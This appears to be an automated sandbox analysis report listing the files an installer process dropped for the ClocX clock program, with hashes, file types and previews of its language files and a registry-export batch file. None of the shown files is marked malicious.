.C.H.A.R.,. .P.V. .C.H.A.R.,. .T.V. .C.H.A.R.,. .C.T. .I.N.T.E.G.E.R.,.

C:\Program Files (x86)\ClocX\BackupAlarms.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.795593782140805
Encrypted:	false
SSDEEP:	3:8hFgEYiXukHqp2YR3snjo1q5hXIWn:8h23iXzj83GU1qYW
MD5:	C8BF8F5A39C3CD41974F240DE82A0E75
SHA1:	F37B3319D1349DDBC34A3229FFE5F567E845C058
SHA-256:	CC51C20EF9133B8B13F5DDC0464679B81677413CF34A5B70785ABFEF857367B5
SHA-512:	0896EF062C1A738DFECF0C40220304C02C602169AFC7F8CBB99E8943AF6D46033441D8DA8D1237D62ABD0EDBD92F400BE0685B8CC09A9A26C91FD5554C78A0FB
Malicious:	false
Preview:	regedit /ea alarms.reg HKEY_CURRENT_USER\Software\BonSoft\ClocX\Alarms

C:\Program Files (x86)\ClocX\ClocX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2090496
Entropy (8bit):	6.160592837778405
Encrypted:	false
SSDEEP:	49152:g6vznGwXRuYl294VVamxwoWVXOSLsJelqJ1cya/caqYY3MSV2Uu:bpXRu594VVajoSXOSLielqJulc1YY3Ms
MD5:	2943A5A31664A8183E993D480B8709BC
SHA1:	E7C28C1692073CF3769B61A8B298D09497D2A635
SHA-256:	282397F5EFC6B5A517881350736901620649C3CF0A692423CF77B9093F933E8B
SHA-512:	F6DFA47D02DC9D1D874B5618C354961EA70E7C5223C27EFEB530DBCEAD610AA8255DFEEFE3A68325DB9B00AC9DF6A5519C885F91ECB82E582BBFA34364CD3518
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: W73PCbSH71.exe, Detection: malicious, Browse Filename: 7uu2Bn48.exe, Detection: malicious, Browse Filename: 7pm0Cc79.exe, Detection: malicious, Browse Filename: o9B7y2ZGmy.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 7zrLU5V186.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.PWSX-gen.2315.32186.exe, Detection: malicious, Browse Filename: XKpsAUCtnp.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: etopt.exe, Detection: malicious, Browse Filename: U1MiP25NrU.exe, Detection: malicious, Browse Filename: OYSVIdqcxa.exe, Detection: malicious, Browse Filename: 2OcriJkWk6.exe, Detection: malicious, Browse Filename: newrock.exe, Detection: malicious, Browse Filename: lPUOqVqw1D.exe, Detection: malicious, Browse Filename: OE9ZntaKqM.exe, Detection: malicious, Browse Filename: Z0m3hA5H5V.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: WrB1gNS1fN.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..h{..h{..h{...{..h{...{..h{...{..h{..i{..h{.^.{..h{.^.{..h{.^.{D.h{.^.{..h{.^.{..h{.^.{..h{Rich..h{........................PE..L....(.P.................\..........A........p....@........................... .....+l ...@.................................T...T....................................................................i..@............p...............................text...wZ.......\.................. ..`.rdata..(....p.......`..............@..@.data............p..................@....rsrc................f..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Lang\Afrikaans.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2284
Entropy (8bit):	5.180986000943191
Encrypted:	false
SSDEEP:	48:YcosbKhFY9+dx0nCQIjGZfZfUnteSos+go5XboJ1oqcBI9zwqbkl9oKRvpgdTv:Gnx0n2jUqeRd5XsPNZbadvmdTv
MD5:	7F8D637F9AB63DC4120C6439B19710DA
SHA1:	38460CDD6C2EBB49FA2E49C6397AAFF369697351
SHA-256:	2F7AC68D51C52C33D8186123BD0B7F8A2087EC5E5B3C5BD16FD844AA220774FB
SHA-512:	1A881116A6CAFC1291E8B71E2FAAE1F350C2459EB38C989286F33495F93A516917D5CA614B69AEB9C46CA7B208B884D12A97B6201B320A3D1A213B59CAC89F3F
Malicious:	false
Preview:	001,Kan nie die beeld laai nie!..002,Kan nie die tydgewer instel nie!..003,Algemeen..004,Voorkoms..005,Aktief..006,Fout met die byvoeging van die Alpha-Kanaal!..007,Kan nie die uurwyser laai nie!..008,Kan nie die minuutwyser laai nie!..009,Kan nie die sekondewyser laai nie!..010,vm..011,nm..012,ClocX - Wekker SINK!..013,Kan nie die agtergrond laai nie!..014, Deurskyning (Win2k/XP)..015, Prioriteit..016,Laag..017,Normaal..018,Hoog..019, Sagte tekening..020,Onaktief (vinnig)..021,Metode 1 (standaard)..022,Metode 2 (stadiger)..023, Beeldkeuses..024,Altyd bo..025,Heg aan werkskerm (Win2k/XP)..026,Deurklikbaar (Win2k/XP)..027,Onbeweeglik..028,Posisie deur werkskerm beperk..029, Standaardkeuses..030,Wys vm/nm..031,Minuutliks..032, Agtergrond..033, Begin..034,Begin met Windows..035,Begin met aanteken (gebruiker)..036,Behou vorige posisie..037,Keuses..038,OK..039,Kanselleer..040,OK..041,Nuwe .....042,Redigeer .....043,Los..044,Toets..045,Sorterr wekkers volgens tyd..046,Naam..047,Tyd..048,Datu

C:\Program Files (x86)\ClocX\Lang\Arabic.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2134
Entropy (8bit):	5.6344245676996625
Encrypted:	false
SSDEEP:	48:sf8rC2JvLPvHQbQbQ3ktvMpVf5+rwx0w5GcgAuPCnXTu:i2JPvCQbEYrelgT6XTu
MD5:	B0277FB1E01F2C417AC128A7E683B81B
SHA1:	4265377B929A15D510A6DC07E2C3986751D984C7
SHA-256:	6F8806A904F7ADED9C217C8A7FA5F38F13CE0BB5F5A21E0CCB74612C9C9B3EB5
SHA-512:	1E3C1001AA92E97932AF9C6B0A28F535A707EA2C7D01A6E333BC95E7CFF71A04A81B6F89EE8D112667C21502D7E591F1D0942C513B82D64638D664E444D590CF
Malicious:	false
Preview:	001, .. ...... ..... ........002, .. ...... ..... .......!..003,General..004,Appearance..005,Enabled..006, ... .. ..... .... .... !..007, ... .. ..... .... ...... !..008, ... .. ..... .... ....... !..009, ... .. ..... .... .......!..010, ...011, ...012, ClocX - ..... ... .......!..013, .. ...... ...... .......!..014, (2K/XP)..........015, ........016, .......017, ... .......018, .......019, .... .........020, (.... (......021, (..... 1 (.........022, (..... 2 (......023, ...... .......024, ..... .. ........025, (2K/XP)...... ... ... ........026, (2K/XP)..... ......027, ..... .......028, ..... ...... ... ........029, ......... ............030, ... ./...031,Minutely !!!..032, .......033, .....034, ... .. .........035, (... .. ..... ....... (..........036, ...... ...... .... .........037, ........038, .......039, .......040, .......041, ......042, .......043, .....044, ........045, ..... ........ ... .......046, .....047, .....048, .......049, %d. ... .. .....050, .......051, ........052

C:\Program Files (x86)\ClocX\Lang\Bosanski.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2360
Entropy (8bit):	5.340070352554395
Encrypted:	false
SSDEEP:	48:OeeySYKHbJVvLmhXm6NPL+Y4EGidNoiqiEUygVMg+a3kGjkIa2RFmk4SaTv:OeeySFbJhLm86NPL+1bwSPU50a37BVI7
MD5:	4DAD1A9BFCB103D54B06909ABB097536
SHA1:	B4D125726C841FDBE717BE04FB22843C2FDEE837
SHA-256:	79DBBB2DE47A367B70646DCCB4AF1DFCD56A9ADCD4959D82612CF6889B1D8CF7
SHA-512:	E2C8F121440D8259191C2932AF7FA5978065AA295726150C0E27B0F569686CC46009939EBAC303A97BA76507B9AB94B56587F712B4332D8620692EF11552F2BB
Malicious:	false
Preview:	001,Ne mogu da u.itam sliku..002,Ne mogu da inicijaliziram tajmer!..003,Op.ta pode.avanja..004,Izgled..005,Omogu.eno..006,Gre.ka pri dodavanju alfa kanala!..007,Ne mogu da u.itam kazaljku za sate!..008,Ne mogu da u.itam kazaljku za minute!..009,Ne mogu da u.itam kazaljku za sekunde!..010,AM..011,PM..012,ClocX - alarm ISKLJU.IVANJE!..013,Ne mogu da u.itam pozadinu!..014, Providnost (Win2k/XP) ..015, Prioritet ..016,Nizak..017,Normalan..018,Visok..019, Umek.avanje..020,Isklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (sporije)..023, Opcije prozora ..024,Uvijek na vrhu..025,Zaka.en za Desktop (Win2k/XP)..026,Klik kroz (Win2k/XP)..027,Nepokretan prozor..028,Ograni.i poziciju veli.inom ekrana..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Pozadina ..033, Startup ..034,Pokreni sa Windows-om..035,Pokreni pri login-u (user)..036,Ne vra.aj prozor na po.etnu poziciju..037,Opcije..038,&U redu..039,&Otka.i..040,&Zatvori..041,&Novi.....042,&Izmijeni.....043,&Obri.i..044,&Test..04

C:\Program Files (x86)\ClocX\Lang\Brazilian Portuguese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2299
Entropy (8bit):	5.287961916315013
Encrypted:	false
SSDEEP:	48:9DLSULlHyDf339z4wakpkxNOp0EIPY5drDQvXcBkK/h2nb3M:9D+ESz3NzNkzadrDQNkao
MD5:	663CA37CB27AA3B419C76F228889B08C
SHA1:	875E600FFEA6E925D35011F5A44CA5E9FECD1140
SHA-256:	CFE734403030DD1A5BDEA2F307FB3416C2DC424AF6C298A127A2CD13900BDE67
SHA-512:	EDA069DA7998919A39409A61ADF01B544FC222CAF490F985507B849A8442DCC62A3F744C026484B5E4450081815B1031A099BEB62EE75BAFC7D5A5C2682A397C
Malicious:	false
Preview:	001,Imagem n.o carregada.002,Temporizador n.o iniciado!.003,Geral.004,Apar.ncia.005,Habilitado.006,Erro no canal alfa!.007,O ponteiro das horas n.o foi carregado!.008,O ponteiro dos minutos n.o foi carregado!.009,O ponteiro dos segundos n.o foi carregado!.010,AM.011,PM.012,ClocX - ENCERRAR o alarme!.013,O fundo n.o foi carregado!.014,Transpar.ncia (Win2k/XP) .015, Prioridade .016,Baixa.017,Normal.018,Alta.019,Contorno suave .020,Desativado (r.pido).021,M.todo 1 (padr.o).022,M.todo 2 (lento).023, Op..es de janelas .024,Sempre em primeiro plano.025,Colar ao Desktop (Win2k/XP).026,Clique atrav.s (Win2k/XP).027,Fixo.028,Posi..o limitada pela tela.029,Op..es do rel.gio .030,Mostrar AM/PM.031,Minuciosamente.032,Fundo .033,Inicializa..o .034,Inicializar com o Windows.035,Inicializar com login (Usu.rio).036,N.o ajustar pos. (monitor-duplo).037,Op..es.038,&OK.039,&Cancelar.040,&Fechar.041,&Novo....042,&Editar....043,&Apagar.044,&Testar.045,Alarmes organizados por tempo.046,Nome.047,Hora.048,Dat

C:\Program Files (x86)\ClocX\Lang\Bulgarian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2341
Entropy (8bit):	5.674982113835398
Encrypted:	false
SSDEEP:	48:Q4D1txCI+Pyna/m9PDbSRiVXwCZhYRag3YRikKYuPCnXTu:NLxWTsPDbS8GCFY81KL6XTu
MD5:	FC5EFBE2A513ACFC40B7276BA1D9E7FD
SHA1:	68879191DC99CBE8F1D0DE298AA2EA9DD2126017
SHA-256:	4DB314221B4C98E7D8E5849D7502BB2926E2A7CD4B340EA127E3351C9FE38F57
SHA-512:	B15EC36EEEA8A5B76BBF5D98F644558A0E0A0602F7F3EF391E043061F45BF37E35A7C046AAAE75C48530B5BF2A16F3CC63113782467B6506E29DD4C86437D2F8
Malicious:	false
Preview:	001,.. .... .. ...... .........!..002,.. .... .. ............ .......!..003,......004,........005,............006,...... ... ........ .. .... .....!..007,.. .... .. ...... ........ .......!..008,.. .... .. ...... ......... .......!..009,.. .... .. ...... .......... .......!..010,AM..011,PM..012,ClocX - .......... .. ........!..013,.. .... .. ...... ...!..014, ........... (Win2k/XP)..015, ...........016,.......017,..........018,.......019, ............020,............ (.....)..021,..... 1 (..........)..022,..... 2 (.....)..023, ..... .. ...........024,...... ........025,....... ... ........ (WinXP)..026,...... .... (Win2./XP)..027,.......... ..........028,........ ......... . ........029, .......... .......030,........ AM/PM..031,.... "X" ........032, .....033, ............034,......... . Windows..035,......... ... ..... .. ............036,.. ............ ...........037,.......038,&OK..039,&........040,&OK..041,&.........042,&..............043,&...........044,&..........045,........ ...

C:\Program Files (x86)\ClocX\Lang\Czech.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	5.569844746682866
Encrypted:	false
SSDEEP:	48:hInwTWyJOTni5/QS90WmUBC3MRq6mgmcvL5uJBUTLoAc9ceGK6mq6vs5:htTWyJOTi54oecg/cT0XAjY6AG
MD5:	A1A459AEBED25C19F29A65E4BA95649C
SHA1:	D9C7E65249563CC9523305E9D56F8BD6AC10B6E1
SHA-256:	A3BFBCEF85E8317089B62B98265B052949F3B11D0B404526B51AA489C14E5649
SHA-512:	E32F2A29DDD2E69F80F091BD081C6CFC5AADE9B7113FD8BA1A18E670FA8A4222238231EF97987B3240CEF205F5F57B22F3CC3B701AAE8D1BDDE8943CAA383352
Malicious:	false
Preview:	001,Nelze na..st soubor!..002,Nelze inicializovat Timer!..003,Obecn...004,Vzhled ..005,Zapnout..006,Chyba v p.ipojen. alfa kan.lu!..007,Nelze na..st hodinovou PNG ru.i.ku!..008,Nelze na..st minutovou PNG ru.i.ku!..009,Nelze na..st sekundovou PNG ru.i.ku!..010,AM..011,PM..012,ClocX - bud.k vyp.n. po..ta.!..013,Nelze na..st pozad.!..014, Pr.hlednost (Win2k/XP) ..015, Priorita ..016,N.zk...017,St.edn...018,Vysok...019, Vyhlazov.n. hran ..020,Vypnuto (rychlej..)..021,Metoda 1 (v.choz.)..022,Metoda 2 (pomalej..)..023, Nastaven. okna ..024,V.dy na vrchu..025,V.dy vespod (Win2k/XP)..026,Proklik.vac. (Win2k/XP)..027,Nep.esunuteln...028,Zak.zat posunut. mimo obraz..029, Mo.nosti pozad. ..030,Zobrazit AM/PM..031,Minutov...032, Styl ..033, Spu.t.n. ..034,Spustit p.i startu Windows..035,Spustit po p.ihl.en. u.ivatele..036,Neupravovat pozici (dual-monitor)..037,Mo.nosti..038,&OK..039,&Zru.it..040,&Zav..t..041,&Nov......042,&Zm.nit.....043,&Smazat..044,&Test..045,Bud.ky (t..d.n. podle .asu)..046,N.

C:\Program Files (x86)\ClocX\Lang\Danish.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2249
Entropy (8bit):	5.355862754705078
Encrypted:	false
SSDEEP:	48:NBTNJZ209IBMoFnjw18YvIPRg85a5QXyKUjFkkaTu:NNNJZ20GBLJw8YvEx0apUjFk5Tu
MD5:	1793FD4614D665E1B0FA41CBFE09C531
SHA1:	360CCBA52499F0B7498DC5E3E87C22F901994AB4
SHA-256:	E2C426880EAFB1B032B70678965628795C5655AB3C97A1F5404DABEC3DD1FF52
SHA-512:	AC446E3EC77A1CD037B270C3FF85E58316EC7624A47AF873BF5B9FA53A5C277EC4675A80A288678F2CB839A30071DF8EEB1BD098A848270450E9E0D7968368BF
Malicious:	false
Preview:	001,Kan ikke hente foto!..002,Kan ikke starte timer!..003,Alment..004,Udsende..005,&Aktivere..006,Fejl ved till.g af alfakanal!..007,Kan ikke loade timeviseren!..008,Kan ikke loade minutviseren!..009,Kan ikke loade sekundviseren!..010,FM..011,AM..012,ClocX - Lyd lukket..013,Kan ikke hente baggrunden!..014, Gennemsigthed (Win2k/XP) ..015, Prioritet ..016,Lav..017,Normal..018,H.j..019, Kantudj.vning ..020,&Inaktiverad (Hurtig)..021,Metode &1 (standard)..022,Metode &2 (Langsomt)..023, Alternativ for vindue ..024,Altid &.verst..025,&Fast p. Skrivbordet (Win2k/XP)..026,&Klik i gennem (Win2k/XP)..027,&Ej flytbart vindue..028,&Begr.nset position til sk.rmen..029, .vrigt ..030,Vis &PM/AM..031,hvert minut..032, Baggrund ..033, Start ..034,&Start samtidigt med Windows..035,S&tart ved login (Anvend)..036,&.ndre ikke pos. (To Sk.rme)..037,Alternativ..038,OK..039,Afbryd..040,&Luk..041,&Nyt.....042,&Redigere.....043,Ta &v.k..044,&Test..045,Alarm sorteret efter tid..046,Navn..047,Tid..048,Dato..049,%

C:\Program Files (x86)\ClocX\Lang\Deutsch.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	5.335592870780523
Encrypted:	false
SSDEEP:	48:ZfBd7wrhvl0k/Bz2XAxq9J4SCVbYaeuHQyVSXh2F0bzvxFWIEuJsZFXlVUMjL7YX:/wxJz2wxqQFb3NSFWIzUXoMzY1Z
MD5:	B4DB92C415B94A3F270B3B4A06D2A446
SHA1:	0413F4D52D6174D0C3C5E792EB2C7BE08E907D02
SHA-256:	33B1ECFA6DC605FCB6C7DBEBF1792AC93AB1F8C7C2FC98DFF10AF4C97553EE9F
SHA-512:	4274A4372006E75042BD9B87E3D8C1F7F9852757FB46459FFAB1E9F4193D3B3103CD49A281507BD76D5548DE22F9B2420568582D32C871A5B952157DAB9F946E
Malicious:	false
Preview:	001,Kann Bild nicht laden!..002,Kann Zeitgeber nicht initialisieren!..003,Allgemein..004,Aussehen..005,aktiv..006,Fehler beim hinzuf.gen des Alpha-Kanals!..007,Kann Stunden-Zeiger nicht laden!..008,Kann Minuten-Zeiger nicht laden!..009,Kann Sekunden-Zeiger nicht laden!..010,AM..011,PM..012,ClocX - Alarm HERUNTERFAHREN!..013,Kann Hintergrund nicht laden!..014, Transparenz (Win2k/XP)..015, Priorit.t..016,Niedrig..017,Normal..018,Hoch..019, Weichzeichnen..020,Deaktiviert (schnell)..021,Methode 1 (standard)..022,Methode 2 (langsamer)..023, Fenster-Optionen..024,Immer oben..025,An Desktop heften (Win2k/XP)..026,Hindurchklickbar (Win2k/XP)..027,Unbewegliches Fenster..028,Position durch Desktop begrenzen..029, Standard-Optionen..030,Zeige AM/PM..031,Min.tlich..032, Hintergrund..033, Starten..034,Mit Windows starten..035,Mit Login starten (Benutzer)..036,Fenster nicht neu positionieren..037,Optionen..038,&OK..039,&Abbrechen..040,&OK..041,&Neu.....042,&Bearbeiten.....043,&L.schen..044,&Testen..

C:\Program Files (x86)\ClocX\Lang\English.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2195
Entropy (8bit):	5.322992609048549
Encrypted:	false
SSDEEP:	48:S9910MsOKxTvsoVeOFLvxCBkin0Dqtbry4whkLA8wFfHYwgAuPRXTv:S9xkFsoXZg0DqtbG4whknwFf4wgTNTv
MD5:	E873D0C2ECD4DCCE5E89191FFDE5253A
SHA1:	04D6C989C41D8E2895B94E1D41882C3F76EF9C0E
SHA-256:	E913E546B84C80F5F2D4B4CF85D72BF1F722AABD7B9C5C97814F828966077296
SHA-512:	A3914AFA462A14721F223EB16E9903709D504C5F77094D6CFA92D07513FD1726616C925E43DCF14E81120161316751D1BDA7DDD0F82936C8A1E8B8F169DC2047
Malicious:	false
Preview:	001,Cannot load image..002,Cannot initialize timer!..003,General..004,Appearance..005,&Enabled..006,Error adding alpha channel!..007,Can't load hour hand!..008,Can't load minute hand!..009,Can't load second hand!..010,AM..011,PM..012,ClocX - alarm SHUTDOWN!..013,Could not load background!..014, &Transparency (Win2000+) ..015, Priorit&y ..016,Low..017,Normal..018,High..019, Antialiasing ..020,Disa&bled (fast)..021,Method &1 (default)..022,Method &2..023, Window options ..024,&Always on top..025,&Pin to Desktop (Win2000+)..026,Clic&k through (Win2000+)..027,&Unmovable window..028,&Limit position by screen size..029, Style options ..030,Show &AM/PM..031,Minutely..032, &Style ..033, Startup ..034,Run ClocX with &Windows (admin)..035,&Run ClocX at user logon..036,Don't ad&just pos. (dual-monitor)..037,Options..038,&OK..039,&Cancel..040,&Close..041,&New.....042,&Edit.....043,&Delete..044,&Test..045,Alarms sorted by time..046,Name..047,Time..048,Date..049,%d. day in month..050,Daily..051,Week

C:\Program Files (x86)\ClocX\Lang\Espanol.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2505
Entropy (8bit):	5.147183891313604
Encrypted:	false
SSDEEP:	48:+SPTJ2eRlB17zb6X3vbc+Texw1Kr/CaA8HvrSdU2VGgcQwha4a6/3V8vcv:+4l2eXT7PY3zc+xMyEvP2shQwUsVl
MD5:	EA82EE5D70868307FB93CA810CAE4613
SHA1:	5F41C9092E8D9FC09AC8143C1DD2994903800D86
SHA-256:	8285C04903A1F1AA4451F0AB81401B88A9FFAF720952B703C708B7363F420EAF
SHA-512:	3D8931B2E543B302C479FD356E8692780D88945FD7E69405060441C5AA77AA54830F8A4FDCBB5C7B6CED3F759800517B2C864E97A53AC31B31434D8AC27B8826
Malicious:	false
Preview:	001,No se puede cargar la imagen.002,.No se puede inicializar el temporizador!.003,General.004,Apariencia.005,Activar.006,.Error al a.adir m.scara de transparencias!.007,.No se puede cargar la aguja de las horas!.008,.No se puede cargar la aguja de los minutos!.009,.No se puede cargar la aguja de los segundos!.010,AM.011,PM.012,.ClocX - APAGADO (alarma)!.013,.No se puede cargar el fondo!.014, Transparencia (Win2k/XP) .015, Prioridad .016,Baja.017,Normal.018,Alta.019, Difuminado de contornos .020,Deshabilitado (r.pido).021,M.todo 1 (por defecto).022,M.todo 2 (lento).023, Opciones de ventana .024,Siempre en primer plano.025,Pegado al escritorio (Win2k/XP).026,Clic a trav.s (Win2k/XP).027,Ventana fija.028,Ventana limitada por la pantalla.029, Opciones Reloj .030,Visualizar AM/PM.031,Minuciosamente.032, Imagen .033, Arranque .034,Empezar con Windows.035,Empezar al login de usuario.036,No ajustar posici.n (2 monitores).037,Opciones.038,&Aceptar.039,&Cancelar.040,&Cerrar.041,&Nuevo....042,&E

C:\Program Files (x86)\ClocX\Lang\Estonian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	5.182401934744877
Encrypted:	false
SSDEEP:	48:HrWjaA54MqKpFKlZx2MPq45Gm38OWuyHVCJ20Qv+bC/gloIGMINTu:hAaH6qH2MPqD48un4p+bUizBuTu
MD5:	84C4D2361103B662BEBF68DA906D4F40
SHA1:	0AA776C9CF78F45212F953A274C4F6C703016AB0
SHA-256:	6CF612F8E25A26A8FE2DD498DF727C4AACCEA47BD2ED871EDCCDD5C074B99167
SHA-512:	8AC021C5CB9281314474FF1DAEF3EF6C2A4262D3744837E46B02ECE9095A4C1798ACE858200AF3E40BB905E1C22BD4AABB0EBA96CA578B2155BFC50A6321E87C
Malicious:	false
Preview:	001,Ei saa pilti avada!..002,Ei saa kella avada!..003,.ldine..004,V.limus..005,Lubatud..006,Viga alfa kanali lisamisel!..007,Ei saa avada tunni osutit!..008,Ei saa avada minuti osutit!..009,Ei saa avada sekundi osutit..010,AM..011,PM..012,meeldetuletuse sulgemine!..013,Ei saa tausta lisada!..014,L.bipaistvus (Win2k/XP) ..015,Prioriteet ..016,Madal..017,Normaalne..018,K.rge..019, Silumine ..020,&Keelatud (kiire)..021,Meetod &1 (vaikimisi)..022,Meetod &2..023, Akna s.tted ..024,&Alati pealmine..025,&T..lauale(Win2k/XP)..026,&Kl.ps kuni (Win2k/XP)..027,&Liikumatu aken..028,&Ekraanil piiratud positsioon..029, Ettem..ratud valikud ..030,N.ita &AM/PM..031,Minimaalselt..032, &Taust ..033, K.ivita ..034,K.ivita koos &Windowsiga..035,&K.ivita koos logimisega (kasutajaga)..036,.ra lisa& positsiooni. (dual-monitoril)..037,Valikud..038,&OK..039,&Katkesta..040,&Sulge..041,&Uus.....042,&Redigeeri.....043,&Kustuta..044,&Testi..045,Meeldetuletused ajaliselt sorteeritud..046,Nimi..047,Aeg..048,Kuup.ev.

C:\Program Files (x86)\ClocX\Lang\French.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2372
Entropy (8bit):	5.250285063754293
Encrypted:	false
SSDEEP:	48:vJFRS8/MlfWqeawdkKPnwShTJAnMZ/ekJOFGD6l243LqicRy:RFs8UxWqeanSTJAnXkJOv7qicg
MD5:	7767FBCDA3DB9B77F1E8FEB02172AE34
SHA1:	2E7FC2B22E094061AB51FC805CF16863E601A512
SHA-256:	4FFE5D4BF560C15DB2777F0BC31652D7C733DC3CAD3B4E052B10BBD6AF65A0EC
SHA-512:	A0C0A6D155ECFBABEC6DDE343E17536C550393DD7900B9A233549A61609F0F248FE9BC94B136B1A3695D9AACB1F63E1C5A6B3ABBE20526A26FEFBE5DB433918F
Malicious:	false
Preview:	001,Ne peut charger l'image.002,Ne peut intialiser l'horloge!.003,G.n.ral.004,Apparence.005,&Disponible.006,Erreur d'ajout de canaux alpha!.007,Ne peut charger l'aiguille des heures!.008,Ne peut charger l'aiguille des minutes!.009,Ne peut charger l'aiguille des secondes!.010,AM.011,PM.012,ClocX - alarme ARRET!.013,Ne peut charger l'image de fond!.014, &Transparence (Win2k/XP) .015, P&riorit. .016,Basse.017,Normale.018,Haute.019, Anticr.nelage .020,D.sacti&v. (rapide).021,M.thode &1 (par d.faut).022,M.thode &2 (lente).023, Options de windows .024,Tou&jours au dessus.025,Fi&x.e au bureau (Win2k/XP).026,&Clic . travers (Win2k/XP).027,Fen&.tre bloqu.e.028,Position &limit.e par l'.cran.029, Options par d.fauts.030,Voir &AM/PM.031,Minutieusement.032, &Image de fond .033, D.marrage .034,D.marrer avec &Windows.035,D.marra&ge avec login (utilisateur).036,Ne pas repositi&onner (2 .crans).037,Options.038,&OK.039,Annul&er.040,&Fermer.041,&Nouveau....042,&.diter....043,&Effacer.044,&Tester.045,Alar

C:\Program Files (x86)\ClocX\Lang\Greek.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2481
Entropy (8bit):	5.748505003046585
Encrypted:	false
SSDEEP:	48:fQQV08HDWRNNxzWfwVDmC7yrdxKInE/nzjsGUM+GGAEIHVGVqYNmZ7+5a1PTu:ruNdwwVyPBxhnE/zYGh+GVpGVBei5a9C
MD5:	9CA688F0E5F418AB6D24DF39CCD336D2
SHA1:	EE45BC8EEFFAD60D1F7F54A9894137CAB160BCEA
SHA-256:	887EE063F618D73F46B7ED49C6A36AE0A117CB060A6AF0986A5E31B7270B9D92
SHA-512:	91153AE38246B27F745C6D12D74603E6B11AD2B28FFCB83E0E7E3582EA864E905631125DF7926B88A97456B5CA04A1E2AF1088D5F329946AAEDB3532417DAB3F
Malicious:	false
Preview:	001,.. ...... .. ........ . ........002,........ .. ............ . ...!..003,........004,..........005,&........006,... ...... .. ........ .. alpha channel!..007,... ...... .. ........ . ........... ..........!..008,... ...... .. ........ . ........... ............!..009,... ...... .. ........ . ........... ...................!..010,....011,....012,......... ClocX .........013,... ...... .. ........ .. backround!..014,&......... (Win2k/XP) ..015,&............ ..016,........017,..........018,.......019,Antialiasing..020,&.............. (.......)..021,&....... 1(..........)..022,&....... 2 (... ....)..023,........ ......... ..024,&..... ... ...........025,&.......... (Win2k/XP)..026,&.... ....... (Win2k/XP)..027,&.............028,&........... ... .... ........029,.............030,&..../......031,... .......032,&Backround..033,...... ..034,&...... .. .. windows..035,&...... .. password (.......)..036,.. ....... ....(..... .......)..037,..........038,&OK..039,&.........040,&..........041,&

C:\Program Files (x86)\ClocX\Lang\Hebrew.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2013
Entropy (8bit):	5.5733608573558495
Encrypted:	false
SSDEEP:	48:A+UFyubnHRyCv8TzCVoL29Vg9mAsMeoXLyh+y/5WnRzuPCnXTu:nubHpUPAoL2VgLsMeoXLT+5Wno6XTu
MD5:	E312627E571323C7805473D7C8A6B3E5
SHA1:	EB9ECA27CDEBD2984B3B4FCE6279731EC7C40EF3
SHA-256:	808986BA3FFBD5B0BEFE6C8CF4DFD5578D138B5569ADF7DC1C41D32F37542D81
SHA-512:	114B44D29C1AF4772CEFCD14213A3D3679995BD6E2C121D403CB36675A4043177D1B9128864229C451A8C8FA8032FE365E0B5139700DFA7DFC1194A718675929
Malicious:	false
Preview:	001,.. .... ..... .. ........002,!.. .... ..... .. ........003,......004,......005,......006,!..... ... ..... .... ......007,!.. .... ..... .. .... .......008,!.. .... ..... .. .... .......009,!.. .... ..... .. .... ........010,AM..011,PM..012,ClocX - !..... .......013,!.. .... ..... .. ......014, (Win2k/XP) ...... ..015, ...... ..016,.......017,.........018,.......019, ..... ..020,(...... (......021,(.... 1 (..... ......022,(.... 2 (.......023, ........ .... ..024,.... .......025,(Win2k/XP) .... ...... ........026,(Win2k/XP) ... .....027,.... .......028,.... .. ...... ... ......029, ....... ...... ..030,AM/PM .....031,... .....032, ... ..033, ..... ..034,Windows .... .. .......035,(.... .. ..... (.......036,(... ..... ..... (...-......037,..........038,&.......039,&.......040,&......041,...&.....042,...&......043,&.....044,.&.....045,...... ....... ... .....046,....047,.....048,.......049,... ..... 